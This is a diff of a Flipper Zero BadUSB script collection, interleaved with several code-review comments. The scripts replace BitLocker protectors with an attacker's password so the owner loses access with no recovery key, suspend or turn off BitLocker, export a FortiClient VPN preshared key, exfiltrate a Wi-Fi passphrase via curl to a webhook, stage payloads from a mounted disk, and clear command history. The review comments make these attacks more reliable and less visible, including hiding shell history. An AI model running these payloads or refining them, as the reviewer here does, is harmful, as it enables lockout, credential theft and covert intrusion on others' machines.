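Review bot: The recipe at L795 (`base64 -w 0`) contradicts the chunking the script depends on: `-w 0` emits one unbroken line, so the awk step at L801 yields a single huge `STRING` line and the crash noted at L787 is exactly what follows; the payload below is wrapped at 76 columns, which is base64's default, so the instruction should read `base64 file.txt > encoded.txt` (or `-w 76`). The cost of the typing should also be stated: `STRING_DELAY 100` waits 100 ms per character, and the roughly 5 KB of base64 here is typed over several minutes with the half-built command line sitting visibly in the console until the final `ENTER` at L1079. Suggested header lines: `REM base64 file.txt > encoded.txt (default 76-column wrapping; -w 0 produces one line and crashes the Flipper)` and `REM STRING_DELAY 100 = ~100 ms per character, so ~5 KB takes several minutes to type`.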
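--- a/BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_disable.txt
+++ b/BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_disable.txt
@@ -0,0 +1,13 @@
+REM launch command prompt as admin as fast as possible
+GUI r
+DELAY 500
+STRING powershell Start-Process cmd -Verb runAs
+ENTER
+DELAY 3000
+ALT y
+DELAY 500
+
+STRING manage-bde -protectors -Disable C: -RebootCount 0
+ENTER
+DELAY 500
+ALT F4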
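Review bot: `manage-bde -protectors -Disable C: -RebootCount 0` (L1116) leaves the meaning of the `0` undocumented: with a reboot count of 0 the protectors stay suspended across reboots until someone runs `manage-bde -protectors -Enable C:`, whereas omitting the switch re-arms them after one reboot, so the readme's "immediately suspends" undersells that this is persistent. Add `REM -RebootCount 0 = stay suspended until manage-bde -protectors -Enable C: is run; omit it to re-enable after one reboot` above L1116. The `ALT y` at L1108 also only answers a consent-style UAC prompt (the user is already an administrator); a credential prompt would need a password typed, so the readme's admin requirement belongs in this script's header as well.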
@ -0,0 +1,161 @@
|
||||
REM Enable Bitlocker encryption with a user-supplied password
|
||||
REM and optionally reboot the computer immediately
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM MORE RESEARCH REQUIRED
|
||||
|
||||
REM ==INFO========================================================================================
|
||||
REM If the drive is already encrypted with a protector (lke TPM)
|
||||
REM it will delete all protectors and substitute our own new password
|
||||
REM without needing to re-encrypt.
|
||||
REM If the drive doesn't have bitlocker enabled, it will do so with the new password
|
||||
REM and take effect on next reboot (which you can optionally enable at the end)
|
||||
|
||||
REM Note #1: This will likely fail if the drive is currently in the process of encryption.
|
||||
|
||||
REM Note #2 If the target computer is a tablet (aka "slab"), Windows will disallow
|
||||
REM preboot authentication options that might require a keyboard. To override this,
|
||||
REM you have to set a local group policy. This might be possible to do by editing the
|
||||
REM registry directly, but since Windows specifically complains about Group Policy,
|
||||
REM I've encoded a Registry.pol below that you can optionally deploy.
|
||||
REM It will create a file in C:\Windows\System32\GroupPolicy\Machine
|
||||
REM which should take effect immediately.
|
||||
REM This Registry.pol enables these two policy values:
|
||||
REM Computer Configuration\Administrative Templates\Windows Components\Bitlocker Drive Encryption\Operating System Drives\ Enable use of Bitlocker authentication requiring preboot keyboard input on slates
|
||||
REM Computer Configuration > Administrative Templates > Windows Components > Bitlocker Drive Encryption > Operating System Drives > Open the key Require additional authentication at startup
|
||||
REM ==Launch command prompt as Admin using GUI + X ===============================================
|
||||
REM ==NOTE that this brings up a Powershell window, not cmd.exe===================================
|
||||
REM ==This method may be more reliable since GUI r can sometimes lose focus on open===============
|
||||
GUI x
|
||||
DELAY 200
|
||||
STRING A
|
||||
DELAY 1000
|
||||
ALT y
|
||||
DELAY 3000
|
||||
|
||||
|
||||
REM ==Optional - local group policy to allow password protection on tablets========================
|
||||
REM ==Simply copying the registry.pol file is not sufficient.
|
||||
|
||||
|
||||
REM STRING $folderpath = [Environment]::GetFolderPath("C:\Windows\System32\GroupPolicy\Machine");
|
||||
REM STRING $filename = $folderpath+"\Registry.pol";
|
||||
|
||||
STRING mkdir C:\windows\system32\grouppolicy\machine
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
STRING $filename = "C:\Windows\System32\GroupPolicy\Machine\Registry.pol";
|
||||
|
||||
STRING $b64="UFJlZwEAAABbAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwA
|
||||
STRING RgBWAEUAAAA7AE8AUwBFAG4AYQBiAGwAZQBQAHIAZQBiAG8AbwB0AEkAbgBwAHUAdABQAHIAbwB0AGUAYwB0AG8AcgBzAE8AbgB
|
||||
STRING TAGwAYQB0AGUAcwAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAY
|
||||
STRING wByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBBAGQAdgBhAG4AYwBlAGQAUwB0AGEAcgB0AHUAcAAAADsABAAAADsABAAAADsAAQAAA
|
||||
STRING F0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBFAG4AYQBiAGwAZQ
|
||||
STRING BCAEQARQBXAGkAdABoAE4AbwBUAFAATQAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAG
|
||||
STRING kAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8
|
||||
STRING AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0
|
||||
STRING AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBLAGU
|
||||
STRING AeQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEY
|
||||
STRING AVgBFAAAAOwBVAHMAZQBUAFAATQBLAGUAeQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0A";
|
||||
|
||||
STRING $bytes = [Convert]::FromBase64String($b64);
|
||||
STRING [IO.File]::WriteAllBytes($filename, $bytes);
|
||||
|
||||
DELAY 300
|
||||
|
||||
REM Create the GPT file. This is definitely required, but I don't know if it changes per machine
|
||||
STRING $filename = "C:\Windows\System32\GroupPolicy\gpt.ini";
|
||||
|
||||
STRING $b64="W0dlbmVyYWxdDQpnUENNYWNoaW5lRXh0ZW5zaW9uTmFtZXM9W3szNTM3OEVBQy02ODNGLTExRDItQTg5
|
||||
STRING QS0wMEMwNEZCQkNGQTJ9e0QwMkIxRjcyLTM0MDctNDhBRS1CQTg4LUU4MjEzQzY3NjFGMX1dIA0KVmVyc2lvbj01DQo=";
|
||||
|
||||
STRING $bytes = [Convert]::FromBase64String($b64);
|
||||
STRING [IO.File]::WriteAllBytes($filename, $bytes);
|
||||
|
||||
DELAY 300
|
||||
|
||||
REM have to gpupdate. This will take an undetermined amount of time
|
||||
REM you may need to set this to trigger on a button press rather than a delay
|
||||
STRING gpupdate /force
|
||||
ENTER
|
||||
|
||||
|
||||
DELAY 10000
|
||||
|
||||
REM ==Remove existing keys, in case bitlocker is already enabled==================================
|
||||
STRING manage-bde -protectors -delete C:
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM ==Clear out from messages, in case no protectors, just in case================================
|
||||
ENTER
|
||||
|
||||
DELAY 2000
|
||||
|
||||
REM ==Enable bitlocker on C: with password and skip hardware test=================================
|
||||
STRING manage-bde -on C: -skiphardwaretest
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM ==remove default TPM. We don't want this enabled.=============================================
|
||||
STRING manage-bde -protectors -delete C:
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM ==Manually add password as a protector. SET YOUR PASSWORD HERE!!==============================
|
||||
REM ==MUST BE AT LEAST 8 CHARACTERS LONG OR ELSE IT WILL FAIL=====================================
|
||||
|
||||
DELAY 1000
|
||||
STRING manage-bde -protectors -add C: -password
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING yourpasswordhere
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING yourpasswordhere
|
||||
ENTER
|
||||
DELAY 3000
|
||||
|
||||
REM ==Force the protection to be enabled so that it engages at next reboot========================
|
||||
STRING manage-bde -Protectors -Enable C:
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM ==Optional - Reboot after a delay. Give you time to escape====================================
|
||||
STRING shutdown /r /t 30
|
||||
ENTER
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM ==Clear history of Windows Terminal====================================
|
||||
ALT F7
|
||||
DELAY 200
|
||||
|
||||
REM ==Enable this if you are doing a delayed reboot using traditional command prompt========================
|
||||
REM ALT F4
|
||||
|
||||
REM ==Enable this if you are doing a delayed reboot using GUI x prompt======================================
|
||||
STRING exit
|
||||
ENTER
|
||||
|
||||
REM ==Optional - Clear run history - not needed if using GUI +X ===================================
|
||||
REM GUI r
|
||||
REM DELAY 500
|
||||
REM STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
|
||||
REM ENTER
|
||||
REM DELAY 300
|
||||
|
||||
REM ==Optional - reboot immediately to lock the computer==========================================
|
||||
REM STRING shutdown /r /t 0
|
||||
REM ENTER
|
||||
|
||||
|
||||
|
||||
|
||||
|
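Review bot: The fixed `DELAY 10000` after `gpupdate /force` (L1359-L1369) is a guess that the comment at L1356 already distrusts; if it fires early the policy is not yet applied, `manage-bde -protectors -add C: -password` fails on slates exactly as the readme describes, and by then the existing protectors have already been deleted at L1377. The repo already has the primitive for this: the shred script at L89 uses `WAIT_FOR_BUTTON_PRESS`, so replace `DELAY 10000` with `WAIT_FOR_BUTTON_PRESS` (and consider moving the first `-protectors -delete` after the password add has succeeded). The placeholder password is typed twice (L1449, L1458) and both must match or the add fails, so a `REM both STRING lines below must be the same password` at L1429 would save a wasted run.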
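--- a/BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_turn_off.txt
+++ b/BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_turn_off.txt
@@ -0,0 +1,32 @@
+REM Turn off bitlocker on C:
+REM This will begin decrypting the drive. When drive is fully decrypted, the protectors will also be removed.
+
+REM Author: emptythevoid
+
+REM Launch command prompt using GUI x (Windows 11-only, but more reliable
+GUI x
+DELAY 200
+STRING A
+DELAY 1000
+ALT y
+DELAY 3000
+
+REM Launch command prompt using GUI r. More compatible, less reliable
+REM GUI r
+REM DELAY 500
+REM STRING powershell Start-Process cmd -Verb runAs
+REM ENTER
+REM DELAY 3000
+REM ALT y
+REM DELAY 500
+
+REM Turn off bitlocker on C:
+STRING manage-bde -off C:
+ENTER
+DELAY 500
+
+REM may need this if using traditional command prompt
+REM ALT F4
+
+STRING exit
+ENTER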
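Review bot: The comment at L1593, `REM Launch command prompt using GUI x (Windows 11-only, but more reliable`, is missing its closing parenthesis, and the "Windows 11-only" claim looks wrong: the Win+X menu exists on Windows 10 too, where the `A` accelerator opens Windows PowerShell (Admin) in the default configuration, which runs `manage-bde` just as well — worth confirming on a Windows 10 machine before keeping the label. I would also record that `STRING exit` at L1664 stops nothing: the decryption started by `manage-bde -off C:` continues in the background and can be followed with `manage-bde -status C:`. Suggested rewrite of L1593: `REM Launch an admin terminal using GUI x (Windows 10/11; more reliable than GUI r). Decryption keeps running after this window exits; check progress with manage-bde -status C:`.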
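--- a/BadUSB/emptythevoid-BadUSB/bitlocker/readme.md
+++ b/BadUSB/emptythevoid-BadUSB/bitlocker/readme.md
@@ -0,0 +1,25 @@
+# Research into manipulating Bitlocker using BadUSB
+
+All scripts require the current user to have administrative permissions on Windows.
+
+bitlocker_disable.txt -- Immediately suspends Bitlocker on C:. Does not remove it
+
+bitlocker_turn_off.txt -- Turns off Bitlocker and begins decryption of C:. When decryption is complete, all key protectors are removed.
+
+bitlocker_encrypt_password.txt:
+
+Uses base64 to dump a registry.pol into Windows to allow tablets (Surface Pro, etc) to have pre-boot authentication enabled. Then perform a gpupdate /force (without this, Bitlocker will fail to enable with just a password when it detects the computer is a tablet, aka "slate")
+
+If Bitlocker is already enabled, all key protectors are removed
+
+Enable Bitlocker on C: and skip hardware test. If Bitlocker wasn't previously enabled, it gets turned on and drive begins encrypting
+
+Remove the default TPM key protector that gets created on new Bitlocker enabled C:
+
+Manually set an attacker-controlled password as the only key protector. Must be at least 8 characters
+
+Enable the new password protector immediately.
+
+Optional: Reboot after a pre-defined delay or immediately, clear history, close window.'
+
+On next boot, Windows will require the attacker-controlled password to boot, and no recovery key will exist.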
@ -0,0 +1,31 @@
|
||||
REM Forticlient config export using BadUSB
|
||||
REM Author: emptythevoid
|
||||
REM 8/23/24
|
||||
|
||||
|
||||
REM Forticlient file is exported with password. Export does NOT require admin
|
||||
REM This export doesn't include VPN login information, but it does include the preshared key and VPN configuration.
|
||||
REM "C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o export -i 1 -p password
|
||||
REM restore the config to Forticlient using
|
||||
REM Requires Admin Rights
|
||||
REM "C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o import -i 1 -p password
|
||||
|
||||
REM USAGE: Set -p password to your secret password - it can be anything. It's just something Forticlient requires
|
||||
REM Set the output path to wherever you want it to go.
|
||||
|
||||
REM export the forticlient configuration to file
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING "C:\Program Files\Fortinet\FortiClient\FCConfig" -m all -f C:\users\user\Desktop\forticonfig.conf -o export -i 1 -p password
|
||||
DELAY 500
|
||||
ENTER
|
||||
|
||||
DELAY 2000
|
||||
|
||||
REM Clear the Run history and exit
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
|
||||
ENTER
|
||||
STRING exit
|
||||
ENTER
|
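--- /dev/null
+++ b/BadUSB/emptythevoid-BadUSB/exfiltrate forticlient/readme.md
@@ -0,0 +1,18 @@
+This script will export the Forticlient configuration on a Windows client. This serves purely as a proof of concept.
+
+YOU have to decide what to do with it. As-is, it will export to the desktop of a user account named "user." YOU MUST CHANGE THIS!
+
+Note: Exporting the configuration in a normal setup does not require admin privileges.
+
+This export doesn't include VPN login information, but it does include the preshared key and VPN configuration.
+
+The command that's run to perform the export looks like this, where 'password' is a password that you choose.
+You'll need it when you try to import it. Change the output path however you want.
+
+```"C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o export -i 1 -p password```
+
+To import ("Restore") the configuration, run the below in an admin primpt, with the password you originally set:
+
+```"C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o import -i 1 -p password```
+
+As a final step, the script will clear the history from the run dialog.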
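--- /dev/null
+++ b/BadUSB/emptythevoid-BadUSB/popos_wifi/README.md
@@ -0,0 +1,9 @@
+Demo of using PopOS 22.04 GUI to exfiltrate the passphrase of the first wifi connection present in network manager. Uses a webhook.
+
+This is done primarily via GUI to avoid needing sudo trying to extract the data using the terminal.
+
+Replace <YOUR WEBHOOK HERE> with your own appropriate webhook to capture the data.
+
+Adjust timings as needed. This is purely a proof-of-concept.
+
+IT ONLY EXTRACTS THE PASSPHRASE, NOT THE SSID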
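--- /dev/null
+++ b/BadUSB/emptythevoid-BadUSB/popos_wifi/popos_wifi.txt
@@ -0,0 +1,60 @@
+REM This is BadUSB demo to grab the top-most wifi password from NetworkManager GUI on PopOS (no sudo needed)
+
+REM Open the app runner and choose network manager
+REM Have to send GUI command twice to get it to trigger the menu
+DELAY 1000
+GUI GUI
+DELAY 1000
+STRING network
+DELAY 500
+ENTER
+
+REM Navigate the NetworkManager GUI
+REM Get to the wifi section and edit first connection listed
+DELAY 1000
+STRING wifi
+DELAY 500
+ENTER
+TAB
+TAB
+TAB
+TAB
+ENTER
+DELAY 500
+TAB
+RIGHTARROW
+RIGHTARROW
+RIGHTARROW
+RIGHTARROW
+
+REM On the security tab, copy the wifi password to clipboard
+DELAY 100
+TAB
+TAB
+TAB
+DELAY 100
+SPACE
+SHIFT TAB
+CTRL C
+
+REM Make this into a curl payload to exfiltrate
+DELAY 1000
+GUI t
+DELAY 500
+STRING curl -X POST <YOUR WEBHOOK HERE> -d '{"wifipass":"
+CTRL-SHIFT v
+STRING "}'
+ENTER
+DELAY 1000
+
+REM Cleanup
+REM Need to find a way to clear out the clipboard
+
+REM Close out of all the Windows that BadUSB opened
+ALT F4
+DELAY 100
+ALT F4
+DELAY 100
+ALT F4
+DELAY 100
+ALT F4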
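Review bot: The curl line splices the pasted passphrase straight into a single-quoted JSON body, so a passphrase containing `'` or `"` either corrupts the JSON or leaves the shell waiting for a closing quote, and the ENTER that follows sends nothing. The whole command, passphrase included, is also kept by the interactive shell and is normally written to its history file when the terminal closes, which the Cleanup comment about the clipboard does not cover; adding `STRING history -c` and `ENTER` before the ALT F4 run clears it for bash. The webhook URL is a placeholder, but unless it is https the passphrase also crosses the network in cleartext.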
@ -0,0 +1,26 @@
|
||||
REM Author: emptythevoid
|
||||
REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup
|
||||
REM Target: Windows 10, 11
|
||||
REM Category: PoC
|
||||
|
||||
REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution
|
||||
REM Powershell will wait until a device with the specified drive label is found.
|
||||
REM When drive label is mounted, Powershell will copy a payload.txt from the disk image to current user's desktop and open it.
|
||||
REM disk image in Flipper must have the drive label: flipdisk
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Run Powershell by full path to avoid Windows Terminal.
|
||||
STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
STRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;$Desktoppath=[environment]::getfolderpath("desktop");cp $driveLetter\payload.txt $desktoppath\payload.txt;invoke-item $desktoppath\payload.txt;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange
|
||||
|
||||
ENTER
|
||||
|
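Review bot: The `Wait-Event` call in the typed PowerShell loop has no timeout, so if the disk image is never mounted (or its label is not `flipdisk`) the console stays open on the target indefinitely, and visibly, since this variant does not launch PowerShell hidden. `Wait-Event` accepts `-Timeout`; replacing the assignment with `$newEvent = Wait-Event -SourceIdentifier volumeChange -Timeout 600; if (-not $newEvent) { Unregister-Event -SourceIdentifier volumeChange; exit }` bounds the wait to ten minutes and tidies the subscription. The `exit` on the success path likewise skips the trailing `Unregister-Event`, which is harmless only because the process ends there.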
@ -0,0 +1,9 @@
|
||||
Example code that runs powershell via BadUSB that waits for a drive label to mount, and then runs a command. You can use this to read a payload from the Flipper's SD card, such as an executable.
|
||||
|
||||
Usage:
|
||||
|
||||
- Run BadUSB script. Powershell will launch and then wait for the specified drive label to mount.
|
||||
|
||||
- Back out of BadUSB app and switch to Mass Storage app and select a disk image with the matching disk label.
|
||||
|
||||
- Once Windows has mounted the drive, it will run the payload.
|
@ -0,0 +1,26 @@
|
||||
REM Author: emptythevoid
|
||||
REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup
|
||||
REM Target: Windows 10, 11
|
||||
REM Category: PoC
|
||||
|
||||
REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution
|
||||
REM Powershell will wait until a device with the specified drive label is found.
|
||||
REM When drive label is mounted, Powershell will launch calc.exe and exit.
|
||||
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Run Powershell by full path to avoid Windows Terminal.
|
||||
STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
ALTSTRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;start-process calc.exe;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange
|
||||
|
||||
ENTER
|
||||
|
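Review bot: The one-liner is typed with ALTSTRING to survive non-US keyboard layouts, but the line that launches it, `STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe`, is still a plain STRING full of layout-sensitive characters (`%`, `\`, `:`), so on the layouts ALTSTRING is meant to handle the launch itself is what breaks first. Typing it as `ALTSTRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe` makes the file consistent with its own intent. The `Wait-Event` in the loop also has no `-Timeout`, so a missing or mislabelled volume leaves the console waiting forever.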
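--- /dev/null
+++ b/BadUSB/emptythevoid-BadUSB/read_serial_tests/read_test.ps1
@@ -0,0 +1,34 @@
+$port = New-Object System.IO.Ports.SerialPort
+$port.PortName = "COM10"
+$port.BaudRate = "115200"
+$port.Parity = "None"
+$port.DataBits = 8
+$port.StopBits = 1
+$port.ReadTimeout = 9000 # 9 seconds
+$port.DTREnable = $True
+$port.open() #opens serial connection
+
+$SPATH="/ext/apps_data/testfile.txt"
+$OPATH="C:\users\$env:username\Desktop\outfile.txt"
+
+echo "attempting to read file"
+Start-Sleep -m 500 # wait for CLI
+
+$port.DiscardInBuffer()
+
+$port.Write("storage read $SPATH `r`n")
+
+Start-Sleep -m 500
+
+$outfile = $port.ReadExisting()
+
+# formatting output file
+
+# Removes first two leading blank lines, trailing garbage at the end
+$outfileformat = $outfile.split([string[]]"`r`n", [StringSplitOptions]::None)
+$outfileformat[2..($outfileformat.length -3)] | Out-File $OPATH
+
+echo "done"
+
+$port.close()
+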
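Review bot: `$port.open()` has no matching close on the error path: if `Write`, `ReadExisting` or the formatting after them throws, the script ends with COM10 still held by this PowerShell process and the next run cannot open it. The read is also a single `ReadExisting()` taken 500 ms after the command, so `ReadTimeout = 9000` never applies and anything the Flipper sends after that window is cut off, which the fixed `[2..(length-3)]` trim then hides. Wrapping the transfer in try/finally and polling until the CLI prompt returns or the deadline passes addresses both; the loop assumes the prompt ends in `>: `, which should be confirmed against the target firmware, and the deadline covers the case where it does not.
```powershell
$port.open() #opens serial connection
try {
    # … unchanged: $SPATH/$OPATH, echo, DiscardInBuffer, storage read write …
    # poll until the CLI prompt comes back, bounded by ReadTimeout
    $outfile = ""
    $deadline = (Get-Date).AddMilliseconds($port.ReadTimeout)
    do {
        Start-Sleep -m 100
        $outfile += $port.ReadExisting()
    } until ($outfile.EndsWith(">: ") -or (Get-Date) -gt $deadline)
    # … unchanged: split, trim, Out-File, echo "done" …
} finally {
    $port.close()
}
```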
@ -0,0 +1,31 @@
|
||||
REM Author: emptythevoid
|
||||
REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup
|
||||
REM Target: Windows 10, 11
|
||||
REM Category: PoC
|
||||
|
||||
REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution
|
||||
REM Powershell will wait until a device with the specified drive label is found.
|
||||
REM When drive label is mounted, Powershell will copy a payload.txt from the disk image to current user's desktop and open it.
|
||||
REM disk image in Flipper must have the drive label: flipdisk
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
STRING powershell
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
REM $d is the powershell command to run once the flipper disk image is found
|
||||
STRING $d={$Desktoppath=[environment]::getfolderpath("desktop"); cp $driveLetter\payload.txt $desktoppath\payload.txt;invoke-item $desktoppath\payload.txt;};
|
||||
|
||||
REM below is the powershell stager to look for a disk label called 'flipdisk'.
|
||||
REM Powershell will remain open and wait until it sees the disk mount.
|
||||
REM Once disk is found, command $d from above is executed.
|
||||
STRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;& $d;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange
|
||||
|
||||
ENTER
|
||||
|
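Review bot: This variant launches PowerShell with a bare `STRING powershell`, whereas the sibling stagers in this commit use the full `%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe` path with a comment that it avoids Windows Terminal; the typed one-liner presumably still runs under Terminal, but the behaviour differs from the other files for no stated reason, and `STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe` keeps the set consistent. The `$d` script block reads `$driveLetter` from the caller's scope when invoked with `& $d`, which works because the loop assigns it first, but that coupling deserves a comment such as `REM $d reads $driveLetter, which the stager loop below sets before & $d runs`. As in the other stagers, `Wait-Event` has no `-Timeout`, so the console waits forever if no `flipdisk` volume ever arrives.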
@ -0,0 +1,26 @@
|
||||
REM Author: emptythevoid
|
||||
REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup
|
||||
REM Target: Windows 10, 11
|
||||
REM Category: PoC
|
||||
|
||||
REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution
|
||||
REM Powershell will wait until a device with the specified drive label is found.
|
||||
REM When drive label is mounted, Powershell will launch calc.exe and exit.
|
||||
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Run Powershell by full path to avoid Windows Terminal.
|
||||
STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
ALTSTRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;start-process calc.exe;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange
|
||||
|
||||
ENTER
|
||||
|
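Review bot: This hunk appears to be line-for-line identical to the earlier calc.exe stager in this commit (same header comments, same full-path launch, same ALTSTRING one-liner); the file header is not visible here, so it may be an intended copy under a second directory, but if not it is duplication that will drift as one copy is fixed and the other is not. Whichever copy is kept has the same unbounded `Wait-Event`: `$newEvent = Wait-Event -SourceIdentifier volumeChange -Timeout 600` plus `if (-not $newEvent) { Unregister-Event -SourceIdentifier volumeChange; exit }` stops the console from waiting forever when no `flipdisk` volume arrives.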
@ -0,0 +1,30 @@
|
||||
REM pause the RDR2 process while in Online to force a solo lobby on Linux
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM Open Terminal - change this depending on your distro
|
||||
CTRL-ALT T
|
||||
|
||||
DELAY 300
|
||||
|
||||
|
||||
REM get PID of RDR2
|
||||
STRING PID=$(pgrep RDR2.exe)
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM pause
|
||||
STRING kill -s SIGSTOP $PID
|
||||
ENTER
|
||||
|
||||
REM How long to wait. 7 seconds should work
|
||||
DELAY 7000
|
||||
|
||||
REM continue process
|
||||
STRING kill -s SIGCONT $PID
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM exit terminal
|
||||
STRING exit
|
||||
ENTER
|
||||
|
